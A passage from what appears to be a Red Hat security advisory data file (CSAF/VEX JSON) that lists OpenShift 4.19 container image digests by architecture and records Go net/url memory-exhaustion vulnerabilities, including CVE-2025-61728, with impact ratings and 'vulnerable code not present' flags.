"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
